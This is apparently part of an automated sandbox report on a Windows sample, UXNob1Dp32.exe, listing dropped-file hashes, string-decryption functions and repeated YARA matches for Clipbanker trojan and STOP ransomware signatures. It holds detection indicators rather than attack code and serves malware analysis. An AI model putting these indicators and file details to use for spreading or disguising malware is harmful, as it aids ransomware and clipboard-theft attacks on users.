Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05E02D1E	4_2_05E02D1E
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DF4E9F	4_2_05DF4E9F
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC8E60	4_2_05DC8E60
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC89D0	4_2_05DC89D0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC59F7	4_2_05DC59F7
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DEF9B0	4_2_05DEF9B0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DEE9A3	4_2_05DEE9A3
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCA916	4_2_05DCA916
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DE18D0	4_2_05DE18D0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7880	4_2_05DC7880
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCDBE0	4_2_05DCDBE0
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC2B60	4_2_05DC2B60
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DD0B00	4_2_05DD0B00
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DC7A80	4_2_05DC7A80
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DCCA10	4_2_05DCCA10

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll 036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 00428C81 appears 36 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 05E58EC0 appears 57 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 05E60160 appears 49 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 004547A0 appears 31 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 05E80160 appears 49 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 05E78EC0 appears 57 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 0042F7C0 appears 55 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 0044F23E appears 53 times
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: String function: 00428520 appears 67 times
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: String function: 05DF0160 appears 49 times
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: String function: 05DE8EC0 appears 57 times

Sample file is different than original file name gathered from version info

Source: UXNob1Dp32.exe, 00000000.00000000.1623059429.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000001.00000000.1626208631.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000001.00000003.1642209574.00000000030B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000003.00000000.1645867010.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000004.00000000.1648903131.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000005.00000000.1650239940.00000000040A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe
Source: UXNob1Dp32.exe, 00000006.00000000.1656218124.00000000040A0000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenameFires( vs UXNob1Dp32.exe

Uses 32bit PE files

Source: UXNob1Dp32.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.8115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 27.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.9315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.build3.exe.8115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.23115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 30.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 29.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.UXNob1Dp32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.mstsca.exe.23115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 26.2.mstsca.exe.23115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.UXNob1Dp32.exe.5db15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.mstsca.exe.9315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 31.2.mstsca.exe.9315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 17.2.mstsca.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 5.2.UXNob1Dp32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
